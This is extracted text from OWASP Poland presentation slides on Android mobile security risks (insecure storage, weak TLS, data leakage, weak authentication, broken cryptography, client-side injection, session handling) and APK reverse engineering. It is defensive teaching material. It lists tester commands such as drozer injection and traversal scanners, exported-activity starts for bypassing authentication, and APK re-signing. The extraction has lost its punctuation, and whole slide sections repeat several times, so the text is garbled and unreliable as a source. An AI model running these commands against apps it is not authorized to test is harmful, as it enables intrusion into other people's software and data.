bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
